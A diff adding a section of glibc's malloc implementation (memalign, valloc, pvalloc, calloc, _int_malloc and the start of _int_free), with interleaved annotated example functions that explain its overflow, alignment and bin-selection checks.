+libc_hidden_def (__libc_realloc)
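+
+/* Illustrative sketch: the "never wraps around" check used by realloc() and
+   free() above.  (uintptr_t) -size is the highest address at which a chunk
+   of that size could still fit below the top of the address space, so any
+   chunk pointer greater than it means p + size wraps past zero and the size
+   field is bogus.  The alignment mask (15) assumes the usual 64-bit
+   MALLOC_ALIGNMENT of 16.  */
+#include <stdint.h>
+#include <stddef.h>
+#include <stdbool.h>
+
+static bool
+ex_chunk_pointer_is_invalid (uintptr_t p, size_t size)
+{
+  bool wraps      = p > (uintptr_t) -size;   /* p + size would overflow */
+  bool misaligned = (p & 15) != 0;           /* chunk not 16-byte aligned */
+  return wraps || misaligned;
+}
+
+/* Example: on a 64-bit target, p == 0xfffffffffffff000 with size == 0x2000
+   fails the first test, because (uintptr_t) -0x2000 == 0xffffffffffffe000
+   and the chunk would wrap past the top of the address space.  */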
+
+void *
+__libc_memalign (size_t alignment, size_t bytes)
+{
+  void *address = RETURN_ADDRESS (0);
+  return _mid_memalign (alignment, bytes, address);
+}
+
+static void *
+_mid_memalign (size_t alignment, size_t bytes, void *address)
+{
+  mstate ar_ptr;
+  void *p;
+
+  void *(*hook) (size_t, size_t, const void *) =
+    atomic_forced_read (__memalign_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(alignment, bytes, address);
+
+  /* If we need less alignment than we give anyway, just relay to malloc.  */
+  if (alignment <= MALLOC_ALIGNMENT)
+    return __libc_malloc (bytes);
+
+  /* Otherwise, ensure that it is at least a minimum chunk size */
+  if (alignment < MINSIZE)
+    alignment = MINSIZE;
+
+  /* If the alignment is greater than SIZE_MAX / 2 + 1 it cannot be a
+     power of 2 and will cause overflow in the check below.  */
+  if (alignment > SIZE_MAX / 2 + 1)
+    {
+      __set_errno (EINVAL);
+      return 0;
+    }
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - alignment - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+
+  /* Make sure alignment is power of 2.  */
+  if (!powerof2 (alignment))
+    {
+      size_t a = MALLOC_ALIGNMENT * 2;
+      while (a < alignment)
+        a <<= 1;
+      alignment = a;
+    }
+
+  if (SINGLE_THREAD_P)
+    {
+      p = _int_memalign (&main_arena, alignment, bytes);
+      assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+	      &main_arena == arena_for_chunk (mem2chunk (p)));
+
+      return p;
+    }
+
+  arena_get (ar_ptr, bytes + alignment + MINSIZE);
+
+  p = _int_memalign (ar_ptr, alignment, bytes);
+  if (!p && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_memalign_retry, 2, bytes, alignment);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      p = _int_memalign (ar_ptr, alignment, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (p)));
+  return p;
+}
+/* For ISO C11.  */
+weak_alias (__libc_memalign, aligned_alloc)
+libc_hidden_def (__libc_memalign)
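+
+/* Illustrative sketch: the power-of-two fixup in _mid_memalign above.  A
+   caller-supplied alignment that is not a power of two is rounded up to the
+   next power of two, starting from twice the allocator's own alignment, so
+   the rest of the memalign machinery only ever deals with power-of-two
+   alignments.  The value 16 for MALLOC_ALIGNMENT is an assumption for a
+   typical 64-bit build.  */
+#include <stddef.h>
+
+static size_t
+ex_round_alignment (size_t alignment)
+{
+  if ((alignment & (alignment - 1)) == 0)   /* already a power of two */
+    return alignment;
+  size_t a = 16 * 2;
+  while (a < alignment)
+    a <<= 1;
+  return a;
+}
+
+/* Example: ex_round_alignment (48) == 64, ex_round_alignment (3) == 32.  */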
+
+void *
+__libc_valloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  return _mid_memalign (pagesize, bytes, address);
+}
+
+void *
+__libc_pvalloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  size_t rounded_bytes = ALIGN_UP (bytes, pagesize);
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - 2 * pagesize - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+  return _mid_memalign (pagesize, rounded_bytes, address);
+}
+
+void *
+__libc_calloc (size_t n, size_t elem_size)
+{
+  mstate av;
+  mchunkptr oldtop, p;
+  INTERNAL_SIZE_T bytes, sz, csz, oldtopsize;
+  void *mem;
+  unsigned long clearsize;
+  unsigned long nclears;
+  INTERNAL_SIZE_T *d;
+
+  /* size_t is unsigned so the behavior on overflow is defined.  */
+  bytes = n * elem_size;
+#define HALF_INTERNAL_SIZE_T \
+  (((INTERNAL_SIZE_T) 1) << (8 * sizeof (INTERNAL_SIZE_T) / 2))
+  if (__builtin_expect ((n | elem_size) >= HALF_INTERNAL_SIZE_T, 0))
+    {
+      if (elem_size != 0 && bytes / elem_size != n)
+        {
+          __set_errno (ENOMEM);
+          return 0;
+        }
+    }
+
+  void *(*hook) (size_t, const void *) =
+    atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      sz = bytes;
+      mem = (*hook)(sz, RETURN_ADDRESS (0));
+      if (mem == 0)
+        return 0;
+
+      return memset (mem, 0, sz);
+    }
+
+  sz = bytes;
+
+  MAYBE_INIT_TCACHE ();
+
+  if (SINGLE_THREAD_P)
+    av = &main_arena;
+  else
+    arena_get (av, sz);
+
+  if (av)
+    {
+      /* Check if we hand out the top chunk, in which case there may be no
+	 need to clear. */
+#if MORECORE_CLEARS
+      oldtop = top (av);
+      oldtopsize = chunksize (top (av));
+# if MORECORE_CLEARS < 2
+      /* Only newly allocated memory is guaranteed to be cleared.  */
+      if (av == &main_arena &&
+	  oldtopsize < mp_.sbrk_base + av->max_system_mem - (char *) oldtop)
+	oldtopsize = (mp_.sbrk_base + av->max_system_mem - (char *) oldtop);
+# endif
+      if (av != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (oldtop);
+	  if (oldtopsize < (char *) heap + heap->mprotect_size - (char *) oldtop)
+	    oldtopsize = (char *) heap + heap->mprotect_size - (char *) oldtop;
+	}
+#endif
+    }
+  else
+    {
+      /* No usable arenas.  */
+      oldtop = 0;
+      oldtopsize = 0;
+    }
+  mem = _int_malloc (av, sz);
+
+  assert (!mem || chunk_is_mmapped (mem2chunk (mem)) ||
+          av == arena_for_chunk (mem2chunk (mem)));
+
+  if (!SINGLE_THREAD_P)
+    {
+      if (mem == 0 && av != NULL)
+	{
+	  LIBC_PROBE (memory_calloc_retry, 1, sz);
+	  av = arena_get_retry (av, sz);
+	  mem = _int_malloc (av, sz);
+	}
+
+      if (av != NULL)
+	__libc_lock_unlock (av->mutex);
+    }
+
+  /* Allocation failed even after a retry.  */
+  if (mem == 0)
+    return 0;
+
+  p = mem2chunk (mem);
+
+  /* Two optional cases in which clearing is not necessary */
+  if (chunk_is_mmapped (p))
+    {
+      if (__builtin_expect (perturb_byte, 0))
+        return memset (mem, 0, sz);
+
+      return mem;
+    }
+
+  csz = chunksize (p);
+
+#if MORECORE_CLEARS
+  if (perturb_byte == 0 && (p == oldtop && csz > oldtopsize))
+    {
+      /* clear only the bytes from non-freshly-sbrked memory */
+      csz = oldtopsize;
+    }
+#endif
+
+  /* Unroll clear of <= 36 bytes (72 if 8-byte sizes).  We know that
+     contents have an odd number of INTERNAL_SIZE_T-sized words;
+     minimally 3.  */
+  d = (INTERNAL_SIZE_T *) mem;
+  clearsize = csz - SIZE_SZ;
+  nclears = clearsize / sizeof (INTERNAL_SIZE_T);
+  assert (nclears >= 3);
+
+  if (nclears > 9)
+    return memset (d, 0, clearsize);
+
+  else
+    {
+      *(d + 0) = 0;
+      *(d + 1) = 0;
+      *(d + 2) = 0;
+      if (nclears > 4)
+        {
+          *(d + 3) = 0;
+          *(d + 4) = 0;
+          if (nclears > 6)
+            {
+              *(d + 5) = 0;
+              *(d + 6) = 0;
+              if (nclears > 8)
+                {
+                  *(d + 7) = 0;
+                  *(d + 8) = 0;
+                }
+            }
+        }
+    }
+
+  return mem;
+}
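+
+/* Illustrative sketch: the overflow test at the top of __libc_calloc.  If
+   both n and elem_size fit in the lower half of size_t's bits, their product
+   cannot overflow, so the expensive division is only done when at least one
+   operand has a high-half bit set.  */
+#include <stddef.h>
+#include <stdbool.h>
+
+#define EX_HALF_SIZE_T (((size_t) 1) << (8 * sizeof (size_t) / 2))
+
+static bool
+ex_calloc_size_overflows (size_t n, size_t elem_size)
+{
+  if ((n | elem_size) >= EX_HALF_SIZE_T)      /* a high-half bit is set */
+    {
+      if (elem_size != 0 && (n * elem_size) / elem_size != n)
+        return true;                          /* n * elem_size wrapped */
+    }
+  return false;
+}
+
+/* Example: on 64-bit, n == 0x100000001 and elem_size == 0x100000001 only
+   reaches the division because of the high bits, and the division then
+   reveals that the true product does not fit in size_t.  */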
+
+/*
+   ------------------------------ malloc ------------------------------
+ */
+
+static void *
+_int_malloc (mstate av, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;               /* normalized request size */
+  unsigned int idx;                 /* associated bin index */
+  mbinptr bin;                      /* associated bin */
+
+  mchunkptr victim;                 /* inspected/selected chunk */
+  INTERNAL_SIZE_T size;             /* its size */
+  int victim_index;                 /* its bin index */
+
+  mchunkptr remainder;              /* remainder from a split */
+  unsigned long remainder_size;     /* its size */
+
+  unsigned int block;               /* bit map traverser */
+  unsigned int bit;                 /* bit map traverser */
+  unsigned int map;                 /* current word of binmap */
+
+  mchunkptr fwd;                    /* misc temp for linking */
+  mchunkptr bck;                    /* misc temp for linking */
+
+#if USE_TCACHE
+  size_t tcache_unsorted_count;	    /* count of unsorted chunks processed */
+#endif
+
+  /*
+     Convert request size to internal form by adding SIZE_SZ bytes
+     overhead plus possibly more to obtain necessary alignment and/or
+     to obtain a size of at least MINSIZE, the smallest allocatable
+     size. Also, checked_request2size traps (returning 0) request sizes
+     that are so large that they wrap around zero when padded and
+     aligned.
+   */
+
+  checked_request2size (bytes, nb);
+
+  /* There are no usable arenas.  Fall back to sysmalloc to get a chunk from
+     mmap.  */
+  if (__glibc_unlikely (av == NULL))
+    {
+      void *p = sysmalloc (nb, av);
+      if (p != NULL)
+	alloc_perturb (p, bytes);
+      return p;
+    }
+
+  /*
+     If the size qualifies as a fastbin, first check corresponding bin.
+     This code is safe to execute even if av is not yet initialized, so we
+     can try it without checking, which saves some time on this fast path.
+   */
+
+#define REMOVE_FB(fb, victim, pp)			\
+  do							\
+    {							\
+      victim = pp;					\
+      if (victim == NULL)				\
+	break;						\
+    }							\
+  while ((pp = catomic_compare_and_exchange_val_acq (fb, victim->fd, victim)) \
+	 != victim);					\
+
+  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
+    {
+      idx = fastbin_index (nb);
+      mfastbinptr *fb = &fastbin (av, idx);
+      mchunkptr pp;
+      victim = *fb;
+
+      if (victim != NULL)
+	{
+	  if (SINGLE_THREAD_P)
+	    *fb = victim->fd;
+	  else
+	    REMOVE_FB (fb, pp, victim);
+	  if (__glibc_likely (victim != NULL))
+	    {
+	      size_t victim_idx = fastbin_index (chunksize (victim));
+	      if (__builtin_expect (victim_idx != idx, 0))
+		malloc_printerr ("malloc(): memory corruption (fast)");
+	      check_remalloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	      /* While we're here, if we see other chunks of the same size,
+		 stash them in the tcache.  */
+	      size_t tc_idx = csize2tidx (nb);
+	      if (tcache && tc_idx < mp_.tcache_bins)
+		{
+		  mchunkptr tc_victim;
+
+		  /* While bin not empty and tcache not full, copy chunks.  */
+		  while (tcache->counts[tc_idx] < mp_.tcache_count
+			 && (tc_victim = *fb) != NULL)
+		    {
+		      if (SINGLE_THREAD_P)
+			*fb = tc_victim->fd;
+		      else
+			{
+			  REMOVE_FB (fb, pp, tc_victim);
+			  if (__glibc_unlikely (tc_victim == NULL))
+			    break;
+			}
+		      tcache_put (tc_victim, tc_idx);
+		    }
+		}
+#endif
+	      void *p = chunk2mem (victim);
+	      alloc_perturb (p, bytes);
+	      return p;
+	    }
+	}
+    }
+
+  /*
+     If a small request, check regular bin.  Since these "smallbins"
+     hold one size each, no searching within bins is necessary.
+     (For a large request, we need to wait until unsorted chunks are
+     processed to find best fit. But for small ones, fits are exact
+     anyway, so we can check now, which is faster.)
+   */
+
+  if (in_smallbin_range (nb))
+    {
+      idx = smallbin_index (nb);
+      bin = bin_at (av, idx);
+
+      if ((victim = last (bin)) != bin)
+        {
+          bck = victim->bk;
+	  if (__glibc_unlikely (bck->fd != victim))
+	    malloc_printerr ("malloc(): smallbin double linked list corrupted");
+          set_inuse_bit_at_offset (victim, nb);
+          bin->bk = bck;
+          bck->fd = bin;
+
+          if (av != &main_arena)
+	    set_non_main_arena (victim);
+          check_malloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	  /* While we're here, if we see other chunks of the same size,
+	     stash them in the tcache.  */
+	  size_t tc_idx = csize2tidx (nb);
+	  if (tcache && tc_idx < mp_.tcache_bins)
+	    {
+	      mchunkptr tc_victim;
+
+	      /* While bin not empty and tcache not full, copy chunks over.  */
+	      while (tcache->counts[tc_idx] < mp_.tcache_count
+		     && (tc_victim = last (bin)) != bin)
+		{
+		  if (tc_victim != 0)
+		    {
+		      bck = tc_victim->bk;
+		      set_inuse_bit_at_offset (tc_victim, nb);
+		      if (av != &main_arena)
+			set_non_main_arena (tc_victim);
+		      bin->bk = bck;
+		      bck->fd = bin;
+
+		      tcache_put (tc_victim, tc_idx);
+	            }
+		}
+	    }
+#endif
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+
+  /*
+     If this is a large request, consolidate fastbins before continuing.
+     While it might look excessive to kill all fastbins before
+     even seeing if there is space available, this avoids
+     fragmentation problems normally associated with fastbins.
+     Also, in practice, programs tend to have runs of either small or
+     large requests, but less often mixtures, so consolidation is not
+     invoked all that often in most programs.  The programs in which it
+     is called frequently are the ones that would otherwise fragment.
+   */
+
+  else
+    {
+      idx = largebin_index (nb);
+      if (atomic_load_relaxed (&av->have_fastchunks))
+        malloc_consolidate (av);
+    }
+
+  /*
+     Process recently freed or remaindered chunks, taking one only if
+     it is an exact fit, or, if this is a small request, the chunk is the
+     remainder from the most recent non-exact fit.  Place other traversed chunks in
+     bins.  Note that this step is the only place in any routine where
+     chunks are placed in bins.
+
+     The outer loop here is needed because we might not realize until
+     near the end of malloc that we should have consolidated, so must
+     do so and retry. This happens at most once, and only when we would
+     otherwise need to expand memory to service a "small" request.
+   */
+
+#if USE_TCACHE
+  INTERNAL_SIZE_T tcache_nb = 0;
+  size_t tc_idx = csize2tidx (nb);
+  if (tcache && tc_idx < mp_.tcache_bins)
+    tcache_nb = nb;
+  int return_cached = 0;
+
+  tcache_unsorted_count = 0;
+#endif
+
+  for (;; )
+    {
+      int iters = 0;
+      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
+        {
+          bck = victim->bk;
+          size = chunksize (victim);
+          mchunkptr next = chunk_at_offset (victim, size);
+
+          if (__glibc_unlikely (size <= 2 * SIZE_SZ)
+              || __glibc_unlikely (size > av->system_mem))
+            malloc_printerr ("malloc(): invalid size (unsorted)");
+          if (__glibc_unlikely (chunksize_nomask (next) < 2 * SIZE_SZ)
+              || __glibc_unlikely (chunksize_nomask (next) > av->system_mem))
+            malloc_printerr ("malloc(): invalid next size (unsorted)");
+          if (__glibc_unlikely ((prev_size (next) & ~(SIZE_BITS)) != size))
+            malloc_printerr ("malloc(): mismatching next->prev_size (unsorted)");
+          if (__glibc_unlikely (bck->fd != victim)
+              || __glibc_unlikely (victim->fd != unsorted_chunks (av)))
+            malloc_printerr ("malloc(): unsorted double linked list corrupted");
+          if (__glibc_unlikely (prev_inuse (next)))
+            malloc_printerr ("malloc(): invalid next->prev_inuse (unsorted)");
+
+          /*
+             If a small request, try to use last remainder if it is the
+             only chunk in unsorted bin.  This helps promote locality for
+             runs of consecutive small requests. This is the only
+             exception to best-fit, and applies only when there is
+             no exact fit for a small chunk.
+           */
+
+          if (in_smallbin_range (nb) &&
+              bck == unsorted_chunks (av) &&
+              victim == av->last_remainder &&
+              (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+            {
+              /* split and reattach remainder */
+              remainder_size = size - nb;
+              remainder = chunk_at_offset (victim, nb);
+              unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
+              av->last_remainder = remainder;
+              remainder->bk = remainder->fd = unsorted_chunks (av);
+              if (!in_smallbin_range (remainder_size))
+                {
+                  remainder->fd_nextsize = NULL;
+                  remainder->bk_nextsize = NULL;
+                }
+
+              set_head (victim, nb | PREV_INUSE |
+                        (av != &main_arena ? NON_MAIN_ARENA : 0));
+              set_head (remainder, remainder_size | PREV_INUSE);
+              set_foot (remainder, remainder_size);
+
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+
+          /* remove from unsorted list */
+          if (__glibc_unlikely (bck->fd != victim))
+            malloc_printerr ("malloc(): corrupted unsorted chunks 3");
+          unsorted_chunks (av)->bk = bck;
+          bck->fd = unsorted_chunks (av);
+
+          /* Take now instead of binning if exact fit */
+
+          if (size == nb)
+            {
+              set_inuse_bit_at_offset (victim, size);
+              if (av != &main_arena)
+		set_non_main_arena (victim);
+#if USE_TCACHE
+	      /* Fill cache first, return to user only if cache fills.
+		 We may return one of these chunks later.  */
+	      if (tcache_nb
+		  && tcache->counts[tc_idx] < mp_.tcache_count)
+		{
+		  tcache_put (victim, tc_idx);
+		  return_cached = 1;
+		  continue;
+		}
+	      else
+		{
+#endif
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+#if USE_TCACHE
+		}
+#endif
+            }
+
+          /* place chunk in bin */
+
+          if (in_smallbin_range (size))
+            {
+              victim_index = smallbin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+            }
+          else
+            {
+              victim_index = largebin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+
+              /* maintain large bins in sorted order */
+              if (fwd != bck)
+                {
+                  /* Or with inuse bit to speed comparisons */
+                  size |= PREV_INUSE;
+                  /* if smaller than smallest, bypass loop below */
+                  assert (chunk_main_arena (bck->bk));
+                  if ((unsigned long) (size)
+		      < (unsigned long) chunksize_nomask (bck->bk))
+                    {
+                      fwd = bck;
+                      bck = bck->bk;
+
+                      victim->fd_nextsize = fwd->fd;
+                      victim->bk_nextsize = fwd->fd->bk_nextsize;
+                      fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
+                    }
+                  else
+                    {
+                      assert (chunk_main_arena (fwd));
+                      while ((unsigned long) size < chunksize_nomask (fwd))
+                        {
+                          fwd = fwd->fd_nextsize;
+			  assert (chunk_main_arena (fwd));
+                        }
+
+                      if ((unsigned long) size
+			  == (unsigned long) chunksize_nomask (fwd))
+                        /* Always insert in the second position.  */
+                        fwd = fwd->fd;
+                      else
+                        {
+                          victim->fd_nextsize = fwd;
+                          victim->bk_nextsize = fwd->bk_nextsize;
+                          fwd->bk_nextsize = victim;
+                          victim->bk_nextsize->fd_nextsize = victim;
+                        }
+                      bck = fwd->bk;
+                    }
+                }
+              else
+                victim->fd_nextsize = victim->bk_nextsize = victim;
+            }
+
+          mark_bin (av, victim_index);
+          victim->bk = bck;
+          victim->fd = fwd;
+          fwd->bk = victim;
+          bck->fd = victim;
+
+#if USE_TCACHE
+      /* If we've processed as many chunks as we're allowed while
+	 filling the cache, return one of the cached ones.  */
+      ++tcache_unsorted_count;
+      if (return_cached
+	  && mp_.tcache_unsorted_limit > 0
+	  && tcache_unsorted_count > mp_.tcache_unsorted_limit)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+#define MAX_ITERS       10000
+          if (++iters >= MAX_ITERS)
+            break;
+        }
+
+#if USE_TCACHE
+      /* If all the small chunks we found ended up cached, return one now.  */
+      if (return_cached)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+      /*
+         If a large request, scan through the chunks of current bin in
+         sorted order to find smallest that fits.  Use the skip list for this.
+       */
+
+      if (!in_smallbin_range (nb))
+        {
+          bin = bin_at (av, idx);
+
+          /* skip scan if empty or largest chunk is too small */
+          if ((victim = first (bin)) != bin
+	      && (unsigned long) chunksize_nomask (victim)
+	        >= (unsigned long) (nb))
+            {
+              victim = victim->bk_nextsize;
+              while (((unsigned long) (size = chunksize (victim)) <
+                      (unsigned long) (nb)))
+                victim = victim->bk_nextsize;
+
+              /* Avoid removing the first entry for a size so that the skip
+                 list does not have to be rerouted.  */
+              if (victim != last (bin)
+		  && chunksize_nomask (victim)
+		    == chunksize_nomask (victim->fd))
+                victim = victim->fd;
+
+              remainder_size = size - nb;
+              unlink_chunk (av, victim);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+		  if (__glibc_unlikely (fwd->bk != bck))
+		    malloc_printerr ("malloc(): corrupted unsorted chunks");
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+      /*
+         Search for a chunk by scanning bins, starting with next largest
+         bin. This search is strictly by best-fit; i.e., the smallest
+         (with ties going to approximately the least recently used) chunk
+         that fits is selected.
+
+         The bitmap avoids needing to check that most blocks are nonempty.
+         The particular case of skipping all bins during warm-up phases
+         when no chunks have been returned yet is faster than it might look.
+       */
+
+      ++idx;
+      bin = bin_at (av, idx);
+      block = idx2block (idx);
+      map = av->binmap[block];
+      bit = idx2bit (idx);
+
+      for (;; )
+        {
+          /* Skip rest of block if there are no more set bits in this block.  */
+          if (bit > map || bit == 0)
+            {
+              do
+                {
+                  if (++block >= BINMAPSIZE) /* out of bins */
+                    goto use_top;
+                }
+              while ((map = av->binmap[block]) == 0);
+
+              bin = bin_at (av, (block << BINMAPSHIFT));
+              bit = 1;
+            }
+
+          /* Advance to bin with set bit. There must be one. */
+          while ((bit & map) == 0)
+            {
+              bin = next_bin (bin);
+              bit <<= 1;
+              assert (bit != 0);
+            }
+
+          /* Inspect the bin. It is likely to be non-empty */
+          victim = last (bin);
+
+          /*  If a false alarm (empty bin), clear the bit. */
+          if (victim == bin)
+            {
+              av->binmap[block] = map &= ~bit; /* Write through */
+              bin = next_bin (bin);
+              bit <<= 1;
+            }
+
+          else
+            {
+              size = chunksize (victim);
+
+              /*  We know the first chunk in this bin is big enough to use. */
+              assert ((unsigned long) (size) >= (unsigned long) (nb));
+
+              remainder_size = size - nb;
+
+              /* unlink */
+              unlink_chunk (av, victim);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+		  if (__glibc_unlikely (fwd->bk != bck))
+		    malloc_printerr ("malloc(): corrupted unsorted chunks 2");
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+
+                  /* advertise as last remainder */
+                  if (in_smallbin_range (nb))
+                    av->last_remainder = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+    use_top:
+      /*
+         If large enough, split off the chunk bordering the end of memory
+         (held in av->top). Note that this is in accord with the best-fit
+         search rule.  In effect, av->top is treated as larger (and thus
+         less well fitting) than any other available chunk since it can
+         be extended to be as large as necessary (up to system
+         limitations).
+
+         We require that av->top always exists (i.e., has size >=
+         MINSIZE) after initialization, so if it would otherwise be
+         exhausted by current request, it is replenished. (The main
+         reason for ensuring it exists is that we may need MINSIZE space
+         to put in fenceposts in sysmalloc.)
+       */
+
+      victim = av->top;
+      size = chunksize (victim);
+
+      if (__glibc_unlikely (size > av->system_mem))
+        malloc_printerr ("malloc(): corrupted top size");
+
+      if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (victim, nb);
+          av->top = remainder;
+          set_head (victim, nb | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head (remainder, remainder_size | PREV_INUSE);
+
+          check_malloced_chunk (av, victim, nb);
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+
+      /* When we are using atomic ops to free fast chunks we can get
+         here for all block sizes.  */
+      else if (atomic_load_relaxed (&av->have_fastchunks))
+        {
+          malloc_consolidate (av);
+          /* restore original bin index */
+          if (in_smallbin_range (nb))
+            idx = smallbin_index (nb);
+          else
+            idx = largebin_index (nb);
+        }
+
+      /*
+         Otherwise, relay to handle system-dependent cases
+       */
+      else
+        {
+          void *p = sysmalloc (nb, av);
+          if (p != NULL)
+            alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+}
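+
+/* Illustrative sketch: which lookup path _int_malloc above tries first for a
+   normalized request nb.  The cut-offs reflect a typical 64-bit build
+   (SIZE_SZ == 8): fastbins cover chunks up to get_max_fast(), which defaults
+   to 128 bytes there, small bins cover chunks below 1024 bytes at 16-byte
+   spacing, and everything else goes through the sorted large bins.  These
+   constants are assumptions here; the real values come from macros defined
+   elsewhere in this file.  */
+#include <stddef.h>
+
+enum ex_bin_family { EX_FASTBIN, EX_SMALLBIN, EX_LARGEBIN };
+
+static enum ex_bin_family
+ex_classify (size_t nb, size_t max_fast)
+{
+  if (nb <= max_fast)
+    return EX_FASTBIN;          /* e.g. nb == 32 -> fastbin_index 0 */
+  if (nb < 1024)
+    return EX_SMALLBIN;         /* e.g. nb == 256 -> smallbin_index 16 */
+  return EX_LARGEBIN;           /* consolidation happens before the search */
+}
+
+/* Example: with the default max_fast of 128, a 200-byte chunk is looked up
+   in an exact-size small bin with no searching, while a 2000-byte chunk is
+   a large-bin chunk and triggers malloc_consolidate() first if fastbins are
+   non-empty.  */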
+
+/*
+   ------------------------------ free ------------------------------
+ */
+
+static void
+_int_free (mstate av, mchunkptr p, int have_lock)
+{
+  INTERNAL_SIZE_T size;        /* its size */
+  mfastbinptr *fb;             /* associated fastbin */
+  mchunkptr nextchunk;         /* next contiguous chunk */
+  INTERNAL_SIZE_T nextsize;    /* its size */
+  int nextinuse;               /* true if nextchunk is used */
+  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
+  mchunkptr bck;               /* misc temp for linking */
+  mchunkptr fwd;               /* misc temp for linking */
+
+  size = chunksize (p);
+
+  /* Little security check which won't hurt performance: the
+     allocator never wraps around at the end of the address space.
+     Therefore we can exclude some size values which might appear
+     here by accident or by "design" from some intruder.  */
+  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
+      || __builtin_expect (misaligned_chunk (p), 0))
+    malloc_printerr ("free(): invalid pointer");
+  /* We know that each chunk is at least MINSIZE bytes in size or a
+     multiple of MALLOC_ALIGNMENT.  */
+  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
+    malloc_printerr ("free(): invalid size");
+
+  check_inuse_chunk(av, p);
+
+#if USE_TCACHE
+  {
+    size_t tc_idx = csize2tidx (size);
+    if (tcache != NULL && tc_idx < mp_.tcache_bins)
+      {
+	/* Check to see if it's already in the tcache.  */
+	tcache_entry *e = (tcache_entry *) chunk2mem (p);
+
+	/* This test succeeds on double free.  However, we don't 100%
+	   trust it (it also matches random payload data at a 1 in
+	   2^<size_t> chance), so verify it's not an unlikely
+	   coincidence before aborting.  */
+	if (__glibc_unlikely (e->key == tcache))
+	  {
+	    tcache_entry *tmp;
+	    LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
+	    for (tmp = tcache->entries[tc_idx];
+		 tmp;
+		 tmp = tmp->next)
+	      if (tmp == e)
+		malloc_printerr ("free(): double free detected in tcache 2");
+	    /* If we get here, it was a coincidence.  We've wasted a
+	       few cycles, but don't abort.  */
+	  }
+
+	if (tcache->counts[tc_idx] < mp_.tcache_count)
+	  {
+	    tcache_put (p, tc_idx);
+	    return;
+	  }
+      }
+  }
+#endif
+
+  /*
